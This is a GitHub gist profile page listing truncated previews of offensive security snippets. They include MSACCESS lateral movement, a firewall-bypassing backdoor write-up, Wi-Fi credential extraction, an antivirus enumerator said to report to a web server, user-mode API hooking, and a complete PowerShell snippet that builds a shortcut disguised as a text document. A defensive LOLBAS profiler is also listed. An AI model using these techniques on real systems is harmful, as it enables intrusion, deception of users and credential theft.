Skip to content

Instantly share code, notes, and snippets.

View sasqwatch's full-sized avatar
💭
I may be slow to respond.

sasqwatch

💭
I may be slow to respond.
48 followers · 273 following
View GitHub Profile
@sasqwatch
sasqwatch / One Liner to Download the Latest Release from Github Repo.md
Last active April 8, 2019 23:27 — forked from steinwaywhw/One Liner to Download the Latest Release from Github Repo.md
One Liner to Download the Latest Release from Github Repo
  • Use curl to get the JSON response for the latest release
  • Use grep to find the line containing file URL
  • Use cut and tr to extract the URL
  • Use wget to download it
curl -s https://api.github.com/repos/jgm/pandoc/releases/latest \
| grep "browser_download_url.*deb" \
| cut -d : -f 2,3 \
| tr -d \" \
@sasqwatch
sasqwatch / Invoke-AccessXSLT.ps1
Last active March 28, 2019 17:09 — forked from Philts/Invoke-AccessXSLT.ps1
<#
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-AccessXSLT {
<#
@sasqwatch
sasqwatch / blog.txt
Created March 26, 2019 23:27
Gist Blog - Inside Out, Simple backdoors
From the inside out, a minimalist backdoor.
I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.
We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel
While I have a full compact, custom version, I will not release this.
@sasqwatch
sasqwatch / CVE-2019-5418_is_RCE.md
Created March 21, 2019 17:34 — forked from mala/CVE-2019-5418_is_RCE.md
Rails の CVE-2019-5418 は RCE (Remote code execution) です

Rails の CVE-2019-5418 は RCE (Remote code execution) です

前置き

  • これは休日に書いた記事で所属している組織とは一切の関係がない。

概要

  • CVE-2019-5418 は実際のところ高確率でRCEなのだが File Content Disclosure という聞き慣れない名前で公表されて、CVE-2019-5419 で DoSが出来るという内容になっている
  • やあ、脆弱性の開示方法というのは実際に難しい問題だ、広範に使われていて影響範囲が甚大になるようなソフトウェアの脆弱性となると、具体的な攻撃コードを載せるなと言う人が多いのはよく分かる。
  • しかしながら、影響範囲についてまでも、不正確な記述がされてしまっている。これは悪い傾向だと自分は思う。これは配慮の結果なのか? それとも無知の結果か?
@sasqwatch
sasqwatch / InterfaceTree.psm1
Created March 15, 2019 21:04 — forked from Cirzen/InterfaceTree.psm1
Get InterfaceTree module
function Get-InterfaceTree
{
<#
.SYNOPSIS
Displays a tree of interfaces for a given type
.DESCRIPTION
Recursively runs the "GetInterfaces() method on a type and its interfaces to build a picture of all the interfaces that are applied to a type"
.EXAMPLE
PS C:\> Get-InterfaceTree hashtable
@sasqwatch
sasqwatch / Extract-WiFi-Creds.ps1
Created February 13, 2019 09:35 — forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#
@sasqwatch
sasqwatch / enumAV.vbs
Created February 13, 2019 09:34 — forked from leoloobeek/enumAV.vbs
Enumerate AV and send to web server (based on https://blog.netspi.com/getting-started-wmi-weaponization-part-2/)
Function Base64Encode(sText)
dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.NodeTypedValue = sText
Base64Encode = EL.Text
End Function
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct")
@sasqwatch
sasqwatch / LNK-creator.ps1
Created February 13, 2019 09:34 — forked from leoloobeek/LNK-creator.ps1
Create LNK file
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk")
$ShortCut.Arguments = " -W 1 -command ....."
$ShortCut.TargetPath = "powershell"
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0";
$ShortCut.Description = "Type: Text Document";
$ShortCut.Save()
@sasqwatch
sasqwatch / Injectable.cpp
Created February 13, 2019 09:34 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
@sasqwatch
sasqwatch / sysmon_lolbas_profiler.ps1
Created February 13, 2019 09:31 — forked from leoloobeek/sysmon_lolbas_profiler.ps1
Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
#https://github.com/LOLBAS-Project/LOLBAS
$lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdep